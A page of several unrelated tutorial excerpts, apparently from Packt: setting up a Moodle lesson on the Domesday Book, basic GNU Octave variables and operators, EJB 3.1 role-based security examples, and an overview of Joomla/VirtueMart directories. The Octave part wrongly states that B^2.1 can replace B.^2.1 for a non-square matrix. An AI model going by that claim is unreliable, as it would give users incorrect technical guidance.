The short video clips we intend to use will come from the excellent National Archives website. It has links to short sequences of approximately ninety seconds in which actors take on the roles of villagers and commissioners and offer a variety of opinions about the nature and purpose of the survey that they are taking part in.

At the end of the lesson, we want the students to have an understanding of:

The purpose of the Domesday Book
How the information was compiled
A variety of attitudes towards the whole process

Our starting point is to create a flow diagram that captures the routes a student might take through the lesson:

The students will see the set of objectives, a short introduction to the Domesday Book, and a table of contents. They can select the videos in any order. When they have watched each video and answered the questions associated with the content, they will be asked to write longer answers to a series of summative questions. These answers are marked individually by the teacher, who thus gets a good overall idea of how well the students have absorbed the information. The assessment of these questions could easily include our essay outcomes marking scale. The lesson ends when the student has completed all of the answers.

The lesson requires:

A branch table (the table of contents)
Four question pages based upon a common template
One end-of-branch page
A question page for the longer answers
An end-of-lesson page

The lesson awards marks for the correct answers to questions on each page in much the same way as if they were part of a quiz. Since we are only adding one question per page, the scores for these questions are of less significance than a student's answers to the essay questions at the end of the lesson. It is, after all, these summative questions that allow the students to demonstrate their understanding of the content they have been working with. Moodle allows this work to be marked in exactly the same way as if it were an essay. This time it will be in the form of an online essay and will take up its place in the Gradebook. We are, therefore, not interested in a standard mark for the students' participation in the lesson, and when we set the lesson up, this will become apparent through the choices we make.

Setting up a lesson

It is important to have a clear idea of the lesson structure before starting the creation of the lesson. We have used paper and pen to create a flow diagram. We know which images, videos, and text are needed on each page and have a clear idea of the formative and summative questions that will enable us to challenge our students and assess how well they have understood the significance of the Domesday Book. We are now in a position to create the lesson:

1. Enter the Year 7 History course and turn on editing.
2. In Topic 1, select Add an Activity and click Lesson.
3. In the Name section, enter an unambiguous name for the lesson, as this is the text that students will click on to enter the lesson. Enter the values as shown in the following screenshot:
4. In the General section, we do not want to impose a time limit on the lesson. We do need to state how many options there are likely to be on each question page. For multiple choice questions, there are usually four options.
5. In the Grade section, we want the essay that students compose at the end of the lesson to be marked in the same way that other essays have been marked.
6. In the Grade options, our preference is to avoid using the lesson questions as an assessment activity. We want it to be a practice lesson where students can work through the activities without needing to earn a score, so we have turned off scoring. The students' final essay submission will be marked in line with our marking policy. Students can retake the lesson as many times as they want to.
7. In the Flow control section, we have clicked the Show advanced button to see all of the options available. We want students to be able to navigate the pages to check answers and go back to review answers if necessary. They can take the lesson as often as they want, as we intend it to be used for revision purposes for a timed essay or in the summer examination. We have ignored the opportunity to add features such as menus and progress bars, as we will be creating our own navigation system. This section also concerns the look and feel of the pages if set to a slide show, an option we are not planning to use.
8. We are planning to create a web link on each page rather than have students download files, so we will not be using the Popup to file or web page option. If you are concerned about the stability of your Internet connection for the web links to videos you plan to show, there is an alternative option. This would involve downloading the files to your computer and converting them to .flv files. They can then be uploaded to the file picker in the usual way, and a link can be created to each one using the Choose a file button shown here. Moodle's video player would play the videos, and you would not be reliant on an unstable Internet connection to see the results.
9. The Dependent on section allows further restrictions to be imposed that are not appropriate for this lesson. We do, however, want to mark the essay that will be submitted in accordance with the custom marking scheme developed earlier in the course, so the box in the Outcomes section must be checked.
10. Clicking the Save and return to course button ensures that the newly created lesson, The Domesday Book, awaits in Topic 1.

Interacting with GNU Octave: Operators

Packt
20 Jun 2011
6 min read
GNU Octave Beginner's Guide
Become a proficient Octave user by learning this high-level scientific numerical tool from the ground up

The reader will benefit from the previous article on GNU Octave Variables.

Basic arithmetic

Octave offers easy ways to perform different arithmetic operations. This ranges from simple addition and multiplication to very complicated linear algebra. In this section, we will go through the most basic arithmetic operations, such as addition, subtraction, multiplication, and left and right division. In general, we should think of these operations in the framework of linear algebra and not in terms of arithmetic on simple scalars.

Addition and subtraction

We begin with addition.

Time for action – doing addition and subtraction operations

I have lost track of the variables! Let us start afresh and clear all variables first:

    octave:66> clear

(Check with whos to see if we cleared everything.) Now, we define four variables in a single command line(!):

    octave:67> a = 2; b=[1 2 3]; c=[1; 2; 3]; A=[1 2 3; 4 5 6];

Note that there is an important difference between the variables b and c; namely, b is a row vector, whereas c is a column vector.

Let us jump into it and try to add the different variables. This is done using the + character:

    octave:68> a+a
    ans = 4
    octave:69> a+b
    ans =
      3 4 5
    octave:70> b+b
    ans =
      2 4 6
    octave:71> b+c
    error: operator +: nonconformant arguments (op1 is 1x3, op2 is 3x1)

It is often convenient to enter multiple commands on the same line. Try to test the difference in separating the commands with commas and semicolons.

What just happened?

The output from Command 68 should be clear; we add the scalar a to itself. In Command 69, we see that the + operator simply adds the scalar a to each element in the b row vector. This is named element-wise addition. It also works if we add a scalar to a matrix or a higher-dimensional array.

Now, if + is applied between two vectors, it will add the elements together element-wise if and only if the two vectors have the same size, that is, they have the same number of rows and columns. This is also what we would expect from basic linear algebra. From Commands 70 and 71, we see that b+b is valid, but b+c is not, because b is a row vector and c is a column vector—they do not have the same size. In the last case, Octave produces an error message stating the problem. This would also be a problem if we tried to add, say, b to A:

    octave:72> b+A
    error: operator +: nonconformant arguments (op1 is 1x3, op2 is 2x3)

From the above examples, we see that adding a scalar to a vector or a matrix is a special case. It is allowed even though the dimensions do not match!

When adding and subtracting vectors and matrices, the sizes must be the same.

Not surprisingly, subtraction is done using the - operator. The same rules apply here; for example:

    octave:73> b-b
    ans =
      0 0 0

is fine, but:

    octave:74> b-c
    error: operator -: nonconformant arguments (op1 is 1x3, op2 is 3x1)

produces an error.

Matrix multiplication

The * operator is used for matrix multiplication. Recall from linear algebra that we cannot multiply any two matrices. Furthermore, matrix multiplication is not commutative. For example, consider the two matrices:

The matrix product AB is defined, but BA is not. If A has size n x k and B has size k x m, the matrix product AB will be a matrix of size n x m. From this, we know that the number of columns of the "left" matrix must match the number of rows of the "right" matrix. We may think of this as (n x k)(k x m) = n x m. In the example above, the matrix product AB therefore results in a 2 x 3 matrix:

Time for action – doing multiplication operations

Let us try to perform some of the same operations for multiplication as we did for addition:

    octave:75> a*a
    ans = 4
    octave:76> a*b
    ans =
      2 4 6
    octave:77> b*b
    error: operator *: nonconformant arguments (op1 is 1x3, op2 is 1x3)
    octave:78> b*c
    ans = 14

What just happened?

From Command 75, we see that * multiplies two scalar variables just like standard multiplication. In agreement with linear algebra, we can also multiply a scalar by each element in a vector, as shown by the output from Command 76. Command 77 produces an error—recall that b is a row vector, which Octave also interprets as a 1 x 3 matrix, so we try to perform the matrix multiplication (1 x 3)(1 x 3), which is not valid. In Command 78, on the other hand, we have (1 x 3)(3 x 1), since c is a column vector, yielding a matrix of size 1 x 1, that is, a scalar. This is, of course, just the dot product between b and c.

Let us try an additional example and perform the matrix multiplication between A and B discussed above. First, we need to instantiate the two matrices, and then we multiply them:

    octave:79> A=[1 2; 3 4]; B=[1 2 3; 4 5 6];
    octave:80> A*B
    ans =
       9 12 15
      19 26 33
    octave:81> B*A
    error: operator *: nonconformant arguments (op1 is 2x3, op2 is 2x2)

Seems like Octave knows linear algebra!

Element-by-element, power, and transpose operations

If the sizes of two arrays are the same, Octave provides a convenient way to multiply the elements element-wise. For example, for B:

    octave:82> B.*B
    ans =
       1  4  9
      16 25 36

Notice that the period (full stop) character precedes the multiplication operator. The period character can also be used in connection with other operators. For example:

    octave:83> B.+B
    ans =
       2  4  6
       8 10 12

which is the same as the command B+B.

If we wish to raise each element in B to the power 2.1, we use the element-wise power operator .^:

    octave:84> B.^2.1
    ans =
       1.0000  4.2871 10.0451
      18.3792 29.3655 43.0643

You can perform the element-wise power operation on two matrices as well (if they are of the same size, of course):

    octave:85> B.^B
    ans =
        1    4    27
      256 3125 46656

If the power is a real number, you can use ^ instead of .^; that is, instead of Command 84 above, you can use:

    octave:84> B^2.1

Transposing a vector or matrix is done via the ' operator. To transpose B, we simply type:

    octave:86> B'
    ans =
      1 4
      2 5
      3 6

Strictly, the ' operator is a complex conjugate transpose operator. We can see this in the following examples:

    octave:87> B = [1 2; 3 4] + I.*eye(2)
    B =
      1 + 1i   2 + 0i
      3 + 0i   4 + 1i
    octave:88> B'
    ans =
      1 - 1i   3 - 0i
      2 - 0i   4 - 1i

Note that in Command 87, we have used the .* operator to multiply the imaginary unit by all the elements in the diagonal matrix produced by eye(2). Finally, note that the command transpose(B) or the operator .' will transpose the matrix but not complex conjugate the elements.

EJB 3.1: Controlling Security Programmatically Using JAAS

Packt
17 Jun 2011
5 min read
EJB 3.1 Cookbook
Build real world EJB solutions with a collection of simple but incredibly effective recipes

The reader is advised to refer to the initial two recipes from the previous article on the process of handling security using annotations.

Getting ready

Programmatic security is effected by adding code within methods to determine who the caller is and then allowing certain actions to be performed based on their capabilities. There are two EJBContext interface methods available to support this type of security: getCallerPrincipal and isCallerInRole. The SessionContext object implements the EJBContext interface. The SessionContext's getCallerPrincipal method returns a Principal object which can be used to get the name or other attributes of the user. The isCallerInRole method takes a string representing a role and returns a Boolean value indicating whether the caller of the method is a member of the role or not.

The steps for controlling security programmatically involve:

Injecting a SessionContext instance
Using either of the above two methods to effect security

How to do it...

To demonstrate these two methods, we will modify the SecurityServlet to use the VoucherManager's approve method and then augment the approve method with code using these methods.

First, modify the SecurityServlet try block to use the following code. We create a voucher as usual and then follow with a call to the submit and approve methods.

    out.println("<html>");
    out.println("<head>");
    out.println("<title>Servlet SecurityServlet</title>");
    out.println("</head>");
    out.println("<body>");
    voucherManager.createVoucher("Susan Billings", "SanFrancisco",
            BigDecimal.valueOf(2150.75));
    voucherManager.submit();
    boolean voucherApproved = voucherManager.approve();
    if(voucherApproved) {
        out.println("<h3>Voucher was approved</h3>");
    } else {
        out.println("<h3>Voucher was not approved</h3>");
    }
    out.println("<h3>Voucher name: " + voucherManager.getName() + "</h3>");
    out.println("</body>");
    out.println("</html>");

Next, modify the VoucherManager EJB by injecting a SessionContext object using the @Resource annotation.

    public class VoucherManager {
        ...
        @Resource
        private SessionContext sessionContext;

Let's look at the getCallerPrincipal method first. This method returns a Principal object (java.security.Principal) which has only one method of immediate interest: getName. This method returns the name of the principal. Modify the approve method so it uses the SessionContext object to get the Principal and then determines whether the name of the principal is "mary" or not. If it is, then approve the voucher.

    public boolean approve() {
        Principal principal = sessionContext.getCallerPrincipal();
        System.out.println("Principal: " + principal.getName());
        if("mary".equals(principal.getName())) {
            voucher.setApproved(true);
            System.out.println("approve method returned true");
            return true;
        } else {
            System.out.println("approve method returned false");
            return false;
        }
    }

Execute the SecurityApplication using "mary" as the user. The application should approve the voucher with the output as shown in the following screenshot:

Execute the application again with a user of "sally". This execution will result in an exception.

    INFO: Access exception

The getCallerPrincipal method simply returns the principal. This frequently results in the need to explicitly include the name of a user in code. The hard coding of user names is not recommended, and checking against each individual user can be time consuming. It is more efficient to check whether a user is in a role.

The isCallerInRole method allows us to determine whether the user is in a particular role or not. It returns a Boolean value indicating whether the user is in the role specified by the method's string argument. Rewrite the approve method to call the isCallerInRole method and pass the string "manager" to it. If the return value is true, approve the voucher.

    public boolean approve() {
        if(sessionContext.isCallerInRole("manager")) {
            voucher.setApproved(true);
            System.out.println("approve method returned true");
            return true;
        } else {
            System.out.println("approve method returned false");
            return false;
        }
    }

Execute the application using both "mary" and "sally". The results should be the same as in the previous example where the getCallerPrincipal method was used.

How it works...

The SessionContext class was used to obtain either a Principal object or to determine whether a user was in a particular role. This required the injection of a SessionContext instance and adding code to determine whether the user was permitted to perform certain actions. This approach resulted in more code than the declarative approach. However, it provided more flexibility in controlling access to the application. These techniques provide the developer with choices as to how to best meet the needs of the application.

There's more...

It is possible to take different actions depending on the user's role using the isCallerInRole method. Let's assume we are using programmatic security with multiple roles:

    @DeclareRoles ({"employee", "manager", "auditor"})

We can use a validateAllowance method to accept a travel allowance amount and determine whether it is appropriate based on the role of the user.

    public boolean validateAllowance(BigDecimal allowance) {
        if(sessionContext.isCallerInRole("manager")) {
            if(allowance.compareTo(BigDecimal.valueOf(2500)) <= 0) {
                return true;
            } else {
                return false;
            }
        } else if(sessionContext.isCallerInRole("employee")) {
            if(allowance.compareTo(BigDecimal.valueOf(1500)) <= 0) {
                return true;
            } else {
                return false;
            }
        } else if(sessionContext.isCallerInRole("auditor")) {
            if(allowance.compareTo(BigDecimal.valueOf(1000)) <= 0) {
                return true;
            } else {
                return false;
            }
        } else {
            return false;
        }
    }

The compareTo method compares two BigDecimal values and returns one of three values:

-1 – if the first number is less than the second number
0 – if the first and second numbers are equal
1 – if the first number is greater than the second number

The valueOf static method converts a number to a BigDecimal value. The value is then compared to allowance.

Summary

This article covered programmatic EJB security based upon the Java Authentication and Authorization Service (JAAS) API.

Further resources on this subject:

EJB 3.1: Introduction to Interceptors [Article]
EJB 3.1: Working with Interceptors [Article]
Hands-on Tutorial on EJB 3.1 Security [Article]
EJB 3 Entities [Article]
Developing an EJB 3.0 entity in WebLogic Server [Article]
Building an EJB 3.0 Persistence Model with Oracle JDeveloper [Article]
NetBeans IDE 7: Building an EJB Application [Article]

Interacting with GNU Octave: Variables

Packt
17 Jun 2011
8 min read
GNU Octave Beginner's Guide
Become a proficient Octave user by learning this high-level scientific numerical tool from the ground up

In the following, we shall see how to instantiate simple variables. By simple variables, we mean scalars, vectors, and matrices. First, a scalar variable with name a is assigned the value 1 by the command:

    octave:1> a=1
    a = 1

That is, you write the variable name, in this case a, and then you assign a value to the variable using the equal sign. Note that in Octave, variables are not instantiated with a type specifier as is known from C and other lower-level languages. Octave interprets a number as a real number unless you explicitly tell it otherwise. In Octave, a real number is a double-precision, floating-point number, which means that the number is accurate within the first 15 digits. (Single precision is accurate within the first 6 digits.)

You can display the value of a variable simply by typing the variable name:

    octave:2> a
    a = 1

Let us move on and instantiate an array of numbers:

    octave:3> b = [1 2 3]
    b =
      1 2 3

Octave interprets this as a row vector rather than as a simple one-dimensional array. The elements (or the entries) in a row vector can also be separated by commas, so the command above could have been:

    octave:3> b = [1, 2, 3]
    b =
      1 2 3

To instantiate a column vector, you can use:

    octave:4> c = [1;2;3]
    c =
      1
      2
      3

Notice how each row is separated by a semicolon. We now move on and instantiate a matrix with two rows and three columns (a 2 x 3 matrix) using the following command:

    octave:5> A = [1 2 3; 4 5 6]
    A =
      1 2 3
      4 5 6

Notice that I use uppercase letters for matrix variables and lowercase letters for scalars and vectors, but this is, of course, a matter of preference, and Octave has no guidelines in this respect. It is important to note, however, that in Octave there is a difference between upper and lowercase letters. If we had used a lowercase a in Command 5 above, Octave would have overwritten the already existing variable instantiated in Command 1. Whenever you assign a new value to an existing variable, the old value is no longer accessible, so be very careful when reassigning new values to variables.

Variable names can be composed of characters, underscores, and numbers. A variable name cannot begin with a number. For example, a_1 is accepted as a valid variable name, but 1_a is not. In this article, we shall use the more general term array when referring to a vector or a matrix variable.

Accessing and changing array elements

To access the second element in the row vector b, we use parentheses:

    octave:6> b(2)
    ans = 2

That is, the array indices start from 1. Here ans is an abbreviation for "answer"; it is a variable in itself with a value, which is 2 in the above example.

For the matrix variable A, we use, for example:

    octave:7> A(2,3)
    ans = 6

to access the element in the second row and the third column. You can access entire rows and columns by using a colon:

    octave:8> A(:,2)
    ans =
      2
      5
    octave:9> A(1,:)
    ans =
      1 2 3

Now that we know how to access the elements in vectors and matrices, we can change the values of these elements as well. Try to set the element A(2,3) to -10.1:

    octave:10> A(2,3) = -10.1
    A =
       1.0000   2.0000   3.0000
       4.0000   5.0000 -10.1000

Since one of the elements in A is now a non-integer number, all elements are shown in floating-point format. The number of displayed digits can change depending on the default value, but for Octave's interpreter there is no difference—it always uses double precision for all calculations unless you explicitly tell it not to. You can change the displayed format using format short or format long. The default is format short.

It is also possible to change the values of all the elements in an entire row by using the colon operator. For example, to substitute the second row in the matrix A with the vector b (from Command 3 above), we use:

    octave:11> A(2,:) = b
    A =
      1 2 3
      1 2 3

This substitution is valid because the vector b has the same number of elements as the rows in A. Let us try to mess things up on purpose and replace the second column in A with b:

    octave:12> A(:,2) = b
    error: A(I,J,...) = X: dimension mismatch

Here Octave prints an error message telling us that the dimensions do not match, because we wanted to substitute three numbers into an array with just two elements. Furthermore, b is a row vector, and we cannot replace a column with a row. Always read the error messages that Octave prints out. Usually they are very helpful.

There is an exception to the dimension mismatch shown above. You can always replace elements, entire rows, and columns with a scalar like this:

    octave:13> A(:,2) = 42
    A =
      1 42 3
      1 42 3

More examples

It is possible to delete elements, entire rows, and columns, extend existing arrays, and much more.

Time for action – manipulating arrays

To delete the second column in A, we use:

    octave:14> A(:,2) = []
    A =
      1 3
      1 3

We can extend an existing array, for example:

    octave:15> b = [b 4 5]
    b =
      1 2 3 4 5

Finally, try the following commands:

    octave:16> d = [2 4 6 8 10 12 14 16 18 20]
    d =
       2 4 6 8 10 12 14 16 18 20
    octave:17> d(1:2:9)
    ans =
       2 6 10 14 18
    octave:18> d(3:3:12) = -1
    d =
       2 4 -1 8 10 -1 14 16 -1 20 0 -1

What just happened?

In Command 14, Octave interprets [] as an empty column vector, and column 2 in A is then deleted by the command. Instead of deleting a column, we could have deleted a row, for example:

    octave:14> A(2,:) = []

On the right-hand side of the equal sign in Command 15, we have constructed a new vector given by [b 4 5]; that is, if we write out b, we get [1 2 3 4 5], since b=[1 2 3]. Because of the equal sign, we assign the variable b to this vector and delete the existing value of b. Of course, we cannot extend b using b=[b; 4; 5], since this attempts to augment a column vector onto a row vector. Octave first evaluates the right-hand side of the equal sign and then assigns that result to the variable on the left-hand side. The right-hand side is named an expression.

In Command 16, we instantiated a row vector d, and in Command 17, we accessed the elements with indices 1, 3, 5, 7, and 9, that is, every second element starting from 1.

Command 18 may have made you a bit concerned! d is a row vector with 10 elements, but the command instructs Octave to enter the value -1 into elements 3, 6, 9, and 12, that is, into an element that does not exist. In such cases, Octave automatically extends the vector (or array in general) and sets the value of the added elements to zero unless you instruct it to set a specific value. In Command 18, we only instructed Octave to set element 12 to -1, and the value of element 11 is therefore given the default value 0, as seen from the output.

In low-level programming languages, accessing non-existing or non-allocated array elements may result in a program crash the first time it is run. This is the best case scenario. In a worse scenario, the program will work for years, but then crash all of a sudden, which is rather unfortunate if it controls a nuclear power plant or a space shuttle.

As you can see, Octave is designed to work in a vectorized manner. It is therefore often referred to as a vectorized programming language.

Complex variables

Octave also supports calculations with complex numbers. As you may recall, a complex number can be written as z = a + bi, where a is the real part, b is the imaginary part, and i is the imaginary unit defined by i^2 = -1. To instantiate a complex variable, say z = 1 + 2i, you can type:

    octave:19> z = 1 + 2I
    z = 1 + 2i

When Octave starts, the variables i, j, I, and J are all imaginary units, so you can use any one of them. I prefer using I for the imaginary unit, since i and j are often used as indices and J is not usually used to symbolize i.

To retrieve the real and imaginary parts of a complex number, you use:

    octave:20> real(z)
    ans = 1
    octave:21> imag(z)
    ans = 2

You can also instantiate complex vectors and matrices, for example:

    octave:22> Z = [1 -2.3I; 4I 5+6.7I]
    Z =
      1.0000 + 0.0000i   0.0000 - 2.3000i
      0.0000 + 4.0000i   5.0000 + 6.7000i

Be careful! If an array element has non-zero real and imaginary parts, do not leave any blanks (space characters) between the two parts. For example, had we used Z=[1 -2.3I; 4I 5 + 6.7I] in Command 22, the last element would be interpreted as two separate elements (5 and 6.7i). This would lead to a dimension mismatch.

The elements in complex arrays can be accessed in the same way as for arrays composed of real numbers. You can use real(Z) and imag(Z) to print the real and imaginary parts of the complex array Z. (Try it out!)

Hands-on Tutorial on EJB 3.1 Security

Packt
15 Jun 2011
9 min read
EJB 3.1 Cookbook

Security is an important aspect of many applications. Central to EJB security is the control of access to classes and methods. There are two approaches to controlling access to EJBs. The first, and the simplest, is to use declarative annotations to specify the types of access permitted. The second approach is to use code to control access to the business methods of an EJB. This second approach should not be used unless the declarative approach does not meet the needs of the application. For example, access to a method may need to be denied during certain times of the day or during certain maintenance periods. Declarative security is not able to handle these types of situations.

In order to incorporate security into an application, it is necessary to understand the Java EE environment and its terminology. The administration of security for the underlying operating system is different from that provided by the EE server. The EE server is concerned with realms, users, and groups. The application is largely concerned with roles. The roles need to be mapped to users and groups of a realm for the application to function properly.

A realm is a domain for a server that incorporates security policies. It possesses a set of users and groups which are considered valid users of an application. A user typically corresponds to an individual, while a group is a collection of individuals. Group members frequently share a common set of responsibilities. A Java EE server may manage multiple realms.

An application is concerned with roles. Access to EJBs and their methods is determined by the role of a user. Roles are defined in such a manner as to provide a logical way of deciding which users/groups can access which methods. For example, a management type role may have the capability to approve a travel voucher, whereas an employee role should not have that capability. By assigning certain users to a role and then specifying which roles can access which methods, we are able to control access to EJBs.

The use of groups makes the process of assigning roles easier. Instead of having to map each individual to a role, the user is assigned to a group and the group is mapped to a role. The business code does not have to check every individual. The Java EE server manages the assignment of users to groups; the application need only be concerned with controlling a group's access.

A group is a server-level concept; roles are application-level. One group can be associated with multiple applications. For example, a student group may use a student club and a student registration application, while a faculty group might also use the registration application but with more capability.

A role is simply a name for a set of capabilities. For example, an auditor role may exist to review and certify a set of accounts. This role would require read access to many, if not all, of the accounts. However, modification privileges may be restricted. Each application has its own set of roles which have been defined to meet the security needs of the application.

The EE server manages realms consisting of users, groups, and resources. The server will authenticate users using Java's underlying security features. The user is then referred to as a principal and has a credential containing the user's security attributes. During the deployment of an application, users and groups are mapped to roles of the application using a deployment descriptor.
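In code, these role names surface as annotation values. As a hedged preview of the declarative approach covered later (the bean name and role names below are illustrative only, not part of the recipes that follow), a declaratively secured EJB typically looks something like this; the mapping of the role names to real users and groups still happens in the deployment descriptor:

import javax.annotation.security.DeclareRoles;
import javax.annotation.security.PermitAll;
import javax.annotation.security.RolesAllowed;
import javax.ejb.Stateless;

@DeclareRoles({"employee", "manager"})
@Stateless
public class TravelBean {

    // any caller in the employee or manager role may submit
    @RolesAllowed({"employee", "manager"})
    public void submitVoucher() {
    }

    // only callers mapped to the manager role may approve
    @RolesAllowed("manager")
    public void approveVoucher() {
    }

    // open to all callers, authenticated or not
    @PermitAll
    public String getPolicyStatement() {
        return "Travel must be approved by a manager.";
    }
}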
The configuration of the deployment descriptor is normally the responsibility of the application deployer. During the execution of the application, the Java Authentication and Authorization Service (JAAS) API authenticates a user and creates a principal representing the user. The principal is then passed to an EJB.

Security in a Java EE environment can be viewed from different perspectives. When information is passed between clients and servers, transport-level security comes into play. Security at this level can include Secure HTTP (HTTPS) and Secure Sockets Layer (SSL). Messages can be sent across a network in the form of Simple Object Access Protocol (SOAP) messages, and these messages can be encrypted. The EE container for EJBs provides application-level security, which is the focus of this article. Most servers provide unified security support between the web container and the EJB container. For example, calls from a servlet in a web container to an EJB are handled automatically, resulting in a flexible security mechanism.

Most of the recipes presented in this article are interrelated. If your intention is to try out the code examples, then make sure you cover the first two recipes, as they provide the framework for the execution of the other recipes. In the first recipe, Creating the SecurityApplication, we create the foundation application for the remaining recipes. In the second recipe, Configuring the server to handle security, the basic steps needed to configure security for an application are presented. The use of declarative security is covered in the Controlling security using declarations recipe, while programmatic security is discussed in the next article on Controlling security programmatically. The Understanding and declaring roles recipe examines roles in more detail, and the Propagating identity recipe talks about how the identity of a user is managed in an application.

Creating the SecurityApplication
In this article, we will create a SecurityApplication built around a simple Voucher entity to persist travel information. This is a simplified version of an application that allows a user to submit a voucher and a manager to approve or disapprove it. The voucher entity itself will hold only minimal information.

Getting ready
The illustration of security will be based on a series of classes:

- Voucher – An entity holding travel-related information
- VoucherFacade – A facade class for the entity
- AbstractFacade – The base class of the VoucherFacade
- VoucherManager – A class used to manage vouchers and where most of the security techniques will be demonstrated
- SecurityServlet – A servlet used to drive the demonstrations

All of these classes will be members of the packt package in the EJB module, except for the servlet, which will be placed in the servlet package of the WAR module.

How to do it...
Create a Java EE application called SecurityApplication with an EJB and a WAR module. Add a packt package to the EJB module and an entity called Voucher to the package.

Add five private instance variables to hold a minimal amount of travel information: name, destination, amount, approved, and an id. Also, add a default and a three-argument constructor to the class to initialize the name, destination, and amount fields. The approved field is also set to false; the intent of this field is to indicate whether the voucher has been approved or not. Though not shown below, also add getter and setter methods for these fields. You may want to add other methods, such as a toString method, if desired.
import java.io.Serializable;
import java.math.BigDecimal;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;

@Entity
public class Voucher implements Serializable {

    private String name;
    private String destination;
    private BigDecimal amount;
    private boolean approved;

    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;

    public Voucher() {
    }

    public Voucher(String name, String destination, BigDecimal amount) {
        this.name = name;
        this.destination = destination;
        this.amount = amount;
        this.approved = false;
    }
    ...
}

Next, add an AbstractFacade class and a VoucherFacade class derived from it. The VoucherFacade class is shown below. As with other facade classes found in previous chapters, the class provides a way of accessing an entity manager and the base class methods of the AbstractFacade class.

import javax.ejb.Stateless;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;

@Stateless
public class VoucherFacade extends AbstractFacade<Voucher> {

    @PersistenceContext(unitName = "SecurityApplication-ejbPU")
    private EntityManager em;

    protected EntityManager getEntityManager() {
        return em;
    }

    public VoucherFacade() {
        super(Voucher.class);
    }
}

Next, add a stateful EJB called VoucherManager. Inject an instance of the VoucherFacade class using the @EJB annotation. Also add an instance variable for a Voucher. We need a createVoucher method that accepts name, destination, and amount arguments, and then creates and subsequently persists the Voucher. Also, add get methods to return the name, destination, and amount of the voucher.

import java.math.BigDecimal;
import javax.ejb.EJB;
import javax.ejb.Stateful;

@Stateful
public class VoucherManager {

    @EJB
    VoucherFacade voucherFacade;
    Voucher voucher;

    public void createVoucher(String name, String destination, BigDecimal amount) {
        voucher = new Voucher(name, destination, amount);
        voucherFacade.create(voucher);
    }

    public String getName() {
        return voucher.getName();
    }

    public String getDestination() {
        return voucher.getDestination();
    }

    public BigDecimal getAmount() {
        return voucher.getAmount();
    }
    ...
}

Next, add three methods:

- submit – This method is intended to be used by an employee to submit a voucher for approval by a manager. To help explain the example, it displays a message showing when the voucher has been submitted.
- approve – This method is used by a manager to approve a voucher. It should set the approved field to true and return true.
- reject – This method is used by a manager to reject a voucher. It should set the approved field to false and return false.

@Stateful
public class VoucherManager {
    ...
    public void submit() {
        System.out.println("Voucher submitted");
    }

    public boolean approve() {
        voucher.setApproved(true);
        return true;
    }

    public boolean reject() {
        voucher.setApproved(false);
        return false;
    }
}

To complete the application framework, add a package called servlet to the WAR module and a servlet called SecurityServlet to the package. Use the @EJB annotation to inject a VoucherManager instance field into the servlet. In the try block of the processRequest method, add code to create a new voucher and then use the submit method to submit it. Next, display a message indicating the submission of the voucher.
import java.io.IOException;
import java.io.PrintWriter;
import java.math.BigDecimal;
import javax.ejb.EJB;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class SecurityServlet extends HttpServlet {

    @EJB
    VoucherManager voucherManager;

    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            voucherManager.createVoucher("Susan Billings", "SanFrancisco", BigDecimal.valueOf(2150.75));
            voucherManager.submit();
            out.println("<html>");
            out.println("<head>");
            out.println("<title>Servlet SecurityServlet</title>");
            out.println("</head>");
            out.println("<body>");
            out.println("<h3>Voucher was submitted</h3>");
            out.println("</body>");
            out.println("</html>");
        } finally {
            out.close();
        }
    }
    ...
}

Execute the SecurityServlet. The browser should display the message: Voucher was submitted.

How it works...
In the Voucher entity, notice the use of BigDecimal for the amount field. This java.math package class is a better choice for currency data than float or double, as its use avoids problems which can occur with rounding. The @GeneratedValue annotation, used with the id field, instructs the persistence provider to generate values for the primary key automatically.

In the VoucherManager class, notice the injection of the stateless VoucherFacade session EJB into the stateful VoucherManager EJB. Each invocation of a VoucherFacade method may result in the method being executed against a different instance of VoucherFacade. This is the correct use of a stateless session EJB. The injection of a stateful EJB into a stateless EJB is not recommended.
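The AbstractFacade base class used by VoucherFacade is referenced above but not listed in this recipe. A minimal sketch of what such a class typically contains is shown below; the method set follows the common generic facade template, so treat it as an assumption rather than the book's exact listing:

import javax.persistence.EntityManager;

public abstract class AbstractFacade<T> {

    private final Class<T> entityClass;

    public AbstractFacade(Class<T> entityClass) {
        this.entityClass = entityClass;
    }

    // subclasses such as VoucherFacade supply the entity manager
    protected abstract EntityManager getEntityManager();

    public void create(T entity) {
        getEntityManager().persist(entity);
    }

    public void edit(T entity) {
        getEntityManager().merge(entity);
    }

    public void remove(T entity) {
        getEntityManager().remove(getEntityManager().merge(entity));
    }

    public T find(Object id) {
        return getEntityManager().find(entityClass, id);
    }
}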


An overview of Joomla! and VirtueMart

Packt
15 Jun 2011
12 min read
Navigating through the Joomla! and VirtueMart directories
You should have a Joomla! and VirtueMart e-commerce site installed somewhere. If not, you should install one now before reading on. From this point onward, we will assume that you can access a Joomla! VirtueMart site and can freely browse its content, either on your local computer using the file manager of your operating system, or on a web server somewhere using an FTP client program. To work on the exercises, you should also be able to edit each of the files.

OK. Let's start our study by navigating through the Joomla! directories. If you look at the root of your Joomla! site, you will be amazed at how large the Joomla! project is. There are close to 5,000 files in total under some 350 directories! It would be difficult to find your way through this vast structure of files if there were no hints at all. Fortunately, Joomla! has a very good directory structure that is easy to follow once you know its basic organization. Knowing your way through this vast structure is very important when embarking on any VirtueMart customization project of considerable size. The good news is that we usually only need to know a very small fraction of those 350 directories and 5,000 files.

In the Joomla! root, the most important directories we need to know are the administrator, components, modules, and plugins directories. (This does not mean that the other directories are not important. We highlight these few just because they are the directories we will reference from time to time.) You will probably recognize that the last three of these shortlisted directories correspond to the three major extension types of Joomla!. So within these directories, we expect to see a series of subdirectories, each of which corresponds to an extension installed in the Joomla! framework. This is exactly the case, except for the plugins directory, where the subdirectories are arranged by plugin type instead of by source.

Let's take a closer look at one of the most important components that comes with Joomla!. Navigate to the components directory and open the subdirectory com_content. The com_content component is the one that manages the articles we create in Joomla!. You have probably been using this component a lot. Within this directory, you will find a number of files and a few subdirectories. We notice there is a file named controller.php and two subdirectories named models and views. We will have more to say on these in a moment.

